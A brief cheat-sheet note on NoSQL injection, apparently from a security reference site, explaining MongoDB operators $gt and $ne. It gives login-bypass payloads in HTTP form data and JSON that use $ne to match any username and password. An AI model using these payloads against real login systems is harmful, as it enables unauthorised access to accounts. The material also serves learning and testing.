NoSQL Injection
db.courses.find({ "rating": { "$gt": 0 } })$gt = greater than
HTTP Data
Section titled “HTTP Data”username[$ne]=abc&password[$ne]=abcJSON Data
Section titled “JSON Data”{"username": {"$ne": null}, "password": {"$ne": null}}$ne = not equal